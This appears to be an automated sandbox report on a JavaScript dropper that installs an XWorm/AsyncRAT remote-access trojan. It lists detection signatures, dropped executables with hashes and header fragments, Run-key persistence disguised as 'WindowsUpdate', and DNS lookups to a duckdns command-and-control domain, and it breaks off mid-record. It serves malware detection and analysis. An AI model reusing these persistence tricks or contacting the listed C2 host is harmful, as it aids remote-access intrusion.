Source: Yara match	File source: 2.2.fzP.exe.3235fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.2ddab48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.fzP.exe.3234350.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.2dde3e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.2cd2728.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fzP.exe.2bda998.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fzP.exe.2bdc5f4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.2cd4360.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.2cd5fbc.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fzP.exe.2bd8d54.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2185105429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2241713561.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2158395639.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2241713561.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2048562319.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fzP.exe PID: 2748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fzP.exe PID: 4308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fzP.exe PID: 6984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Service.exe PID: 1360, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 5.2.fzP.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.fzP.exe.3232718.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.2ddc78c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.fzP.exe.3235fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.2ddab48.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.fzP.exe.3234350.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.2dde3e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.2cd2728.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fzP.exe.2bda998.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fzP.exe.2bdc5f4.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.2cd4360.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Service.exe.2cd5fbc.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.fzP.exe.2bd8d54.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2185105429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2241713561.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2158395639.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2241713561.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2048562319.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: fzP.exe PID: 2748, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fzP.exe PID: 4308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: fzP.exe PID: 6984, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Service.exe PID: 1360, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	12 Scripting	Valid Accounts	1 Native API	12 Scripting	111 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	11 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	21 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
kixx.js	34%	ReversingLabs	Script-JS.Trojan.Vjw0rm
kixx.js	21%	Virustotal		Browse
kixx.js	100%	Avira	JS/Dldr.G17

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\Service.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\fzP.exe	100%	Avira	TR/Dropper.Gen
C:\Users\user\AppData\Roaming\Service.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\fzP.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
kizitodavina.duckdns.org	11%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
kizitodavina.duckdns.org	11%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
kizitodavina.duckdns.org	unknown	unknown	true	11%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
kizitodavina.duckdns.org	true	11%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://go.micj	fzP.exe, 00000007.00000002.2187124277.0000000000DC5000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523187
Start date and time:	2024-10-01 09:15:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	kixx.js
Detection:	MAL
Classification:	mal100.troj.evad.winJS@48/5@4/0
EGA Information:	Successful, ratio: 23.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 287 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Service.exe, PID 1436 because it is empty
Execution Graph export aborted for target Service.exe, PID 1856 because it is empty
Execution Graph export aborted for target Service.exe, PID 2468 because it is empty
Execution Graph export aborted for target Service.exe, PID 2968 because it is empty
Execution Graph export aborted for target Service.exe, PID 3560 because it is empty
Execution Graph export aborted for target Service.exe, PID 5348 because it is empty
Execution Graph export aborted for target Service.exe, PID 5796 because it is empty
Execution Graph export aborted for target Service.exe, PID 6284 because it is empty
Execution Graph export aborted for target Service.exe, PID 6512 because it is empty
Execution Graph export aborted for target fzP.exe, PID 1196 because it is empty
Execution Graph export aborted for target fzP.exe, PID 2260 because it is empty
Execution Graph export aborted for target fzP.exe, PID 3996 because it is empty
Execution Graph export aborted for target fzP.exe, PID 4052 because it is empty
Execution Graph export aborted for target fzP.exe, PID 4668 because it is empty
Execution Graph export aborted for target fzP.exe, PID 4708 because it is empty
Execution Graph export aborted for target fzP.exe, PID 5572 because it is empty
Execution Graph export aborted for target fzP.exe, PID 5804 because it is empty
Execution Graph export aborted for target fzP.exe, PID 652 because it is empty
Execution Graph export aborted for target fzP.exe, PID 6984 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:16:32	API Interceptor	3471295x Sleep call for process: fzP.exe modified
09:15:58	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Local\Temp\fzP.exe
09:16:06	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\Service.exe
09:16:15	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\AppData\Local\Temp\fzP.exe
09:16:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\Service.exe

Process:	C:\Users\user\AppData\Roaming\Service.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.355496254154943
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
MD5:	3C255C75EA6EB42410894C0D08A4E324
SHA1:	34B3512313867B269C545241CD502B960213293A
SHA-256:	116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
SHA-512:	41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fzP.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\fzP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	520
Entropy (8bit):	5.355496254154943
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
MD5:	3C255C75EA6EB42410894C0D08A4E324
SHA1:	34B3512313867B269C545241CD502B960213293A
SHA-256:	116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
SHA-512:	41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\fzP.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	41
Entropy (8bit):	3.7195394315431693
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
MD5:	0DB526D48DAB0E640663E4DC0EFE82BA
SHA1:	17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
SHA-256:	934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
SHA-512:	FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
Malicious:	false
Preview:	....### explorer ###..[WIN]r[WIN]r[WIN]r

C:\Users\user\AppData\Local\Temp\fzP.exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	51712
Entropy (8bit):	7.811698424763338
Encrypted:	false
SSDEEP:	1536:pXyLxWypPi+hp/MTBLeplEcZYeUmx/2ikb2c:ELx7Pi+hp0TZzUMikCc
MD5:	E69512E47D3A857DE921FDB578CC6143
SHA1:	75D4BB693EA678DE775C8BC99C96C08AB8A5E4F3
SHA-256:	293B83F50094AA4C13386BAEB17F533B0E7F1B6B39BDAEA71DF2FF7BD5FC4233
SHA-512:	2A8FF068B8B2386BC68C23692E59EE9D9E7E18CCDD1E0B175D59141962BD623EA03D37DC69103E495484AA09479F59A12E7BACF5D7D9CEAABDBDDDA4813A4C56
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c.f............................~.... ........@.. ....................... ............@.................................(...S.......@............................................................................ ............... ..H............text........ ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B................`.......H........................#..\|............................................0..........r...p(....s.......o....t........0..........s....&..+.(....,...X...2...0..........rC..p(.....r...p(......r...pr...p(......r...pr...p(......(......r+..po......rM..po....................(....o........rU..p..................o....&(....(.............o....(.................................0..'.......~....rW..po......r...pr...po.....o......0..........(....s......(...."..o......0..".......~...

C:\Users\user\AppData\Roaming\Service.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\fzP.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	51712
Entropy (8bit):	7.811698424763338
Encrypted:	false
SSDEEP:	1536:pXyLxWypPi+hp/MTBLeplEcZYeUmx/2ikb2c:ELx7Pi+hp0TZzUMikCc
MD5:	E69512E47D3A857DE921FDB578CC6143
SHA1:	75D4BB693EA678DE775C8BC99C96C08AB8A5E4F3
SHA-256:	293B83F50094AA4C13386BAEB17F533B0E7F1B6B39BDAEA71DF2FF7BD5FC4233
SHA-512:	2A8FF068B8B2386BC68C23692E59EE9D9E7E18CCDD1E0B175D59141962BD623EA03D37DC69103E495484AA09479F59A12E7BACF5D7D9CEAABDBDDDA4813A4C56
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c.f............................~.... ........@.. ....................... ............@.................................(...S.......@............................................................................ ............... ..H............text........ ...................... ..`.rsrc...@...........................@..@.reloc..............................@..B................`.......H........................#..\|............................................0..........r...p(....s.......o....t........0..........s....&..+.(....,...X...2...0..........rC..p(.....r...p(......r...pr...p(......r...pr...p(......(......r+..po......rM..po....................(....o........rU..p..................o....&(....(.............o....(.................................0..'.......~....rW..po......r...pr...po.....o......0..........(....s......(...."..o......0..".......~...

Static File Info

General

File type:	Unicode text, UTF-16, little-endian text, with very long lines (28661), with CRLF line terminators
Entropy (8bit):	3.1863265671440595
TrID:	Text - UTF-16 (LE) encoded (2002/1) 66.67% MP3 audio (1001/1) 33.33%
File name:	kixx.js
File size:	1'476'882 bytes
MD5:	3094dc3bf3dacc07b7ae62e6cb53e02d
SHA1:	7ff5441adf6b751704534c979046d5698dfdfdb1
SHA256:	8fa2ab71f2e7c4276167c217778c01dedf71053bf9d4cee5274e8c077ef327dd
SHA512:	48ba866defc3f817f8f043908eba4d8eec59d4f9af82c16184c95040c5d099c199999365f86d39619bd1c90e19d4a35f9f0b7292ff50ab1e69f161f363c46aab
SSDEEP:	1536:u3BYP+9LHqamUMgVSnD5MOUbsNZoxOhjPFi/nZky:aM+9jDWgVSnD5QQNZDhjdi/1
TLSH:	0F65D4FCF5851F2AA352605C9AC8585D37B2E731F5D9CF102668670AC18EC2B87D8ED8
File Content Preview:	.././.C.o.d.e.d. .B.y. .P.j.o.a.o.1.5.7.8.........v.a.r. .w.d.f.f.B.M.d.p.w.u.;.....w.d.f.f.B.M.d.p.w.u. .=. .[.".".,.....".W.S.!.......................!.c..!.!.!.!."" .!."r.!.......................!.i..!.!.!.!."" .!."!.......................!.p..!.!.!.!.

File Icon


Icon Hash:	68d69b8bb6aa9a86

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 09:16:05.066641092 CEST	64379	53	192.168.2.5	1.1.1.1
Oct 1, 2024 09:16:06.069418907 CEST	64379	53	192.168.2.5	1.1.1.1
Oct 1, 2024 09:16:07.069511890 CEST	64379	53	192.168.2.5	1.1.1.1
Oct 1, 2024 09:16:09.069607973 CEST	64379	53	192.168.2.5	1.1.1.1
Oct 1, 2024 09:16:09.078433037 CEST	53	64379	1.1.1.1	192.168.2.5
Oct 1, 2024 09:16:09.078445911 CEST	53	64379	1.1.1.1	192.168.2.5
Oct 1, 2024 09:16:09.078454018 CEST	53	64379	1.1.1.1	192.168.2.5
Oct 1, 2024 09:16:09.078557014 CEST	53	64379	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2024 09:16:05.066641092 CEST	192.168.2.5	1.1.1.1	0xdbe9	Standard query (0)	kizitodavina.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 09:16:06.069418907 CEST	192.168.2.5	1.1.1.1	0xdbe9	Standard query (0)	kizitodavina.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 09:16:07.069511890 CEST	192.168.2.5	1.1.1.1	0xdbe9	Standard query (0)	kizitodavina.duckdns.org	A (IP address)	IN (0x0001)	false
Oct 1, 2024 09:16:09.069607973 CEST	192.168.2.5	1.1.1.1	0xdbe9	Standard query (0)	kizitodavina.duckdns.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 1, 2024 09:16:09.078433037 CEST	1.1.1.1	192.168.2.5	0xdbe9	Server failure (2)	kizitodavina.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 09:16:09.078445911 CEST	1.1.1.1	192.168.2.5	0xdbe9	Server failure (2)	kizitodavina.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 09:16:09.078454018 CEST	1.1.1.1	192.168.2.5	0xdbe9	Server failure (2)	kizitodavina.duckdns.org	none	none	A (IP address)	IN (0x0001)	false
Oct 1, 2024 09:16:09.078557014 CEST	1.1.1.1	192.168.2.5	0xdbe9	Server failure (2)	kizitodavina.duckdns.org	none	none	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	03:15:53
Start date:	01/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\kixx.js"
Imagebase:	0x7ff634b00000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:15:56
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0xf70000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.2048562319.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.2048562319.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:15:56
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0x3e0000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	03:16:06
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0x8a0000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000004.00000002.2158395639.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.2158395639.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:16:07
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0x850000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000005.00000002.2185105429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.2185105429.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:16:07
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0x660000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:16:07
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0x740000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:16:07
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0x660000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:16:07
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Local\Temp\fzP.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fzP.exe"
Imagebase:	0x780000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:16:15
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x970000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2241713561.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.2241713561.0000000002DC7000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000B.00000002.2241713561.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000B.00000002.2241713561.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:16:15
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x5e0000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:16:15
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x240000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:16:15
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Service.exe"
Imagebase:	0x480000
File size:	51'712 bytes
MD5 hash:	E69512E47D3A857DE921FDB578CC6143
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	03:16:15
Start date:	01/10/2024
Path:	C:\Users\user\AppData\Roaming\Service.exe
Wow64 process (32bit):	true
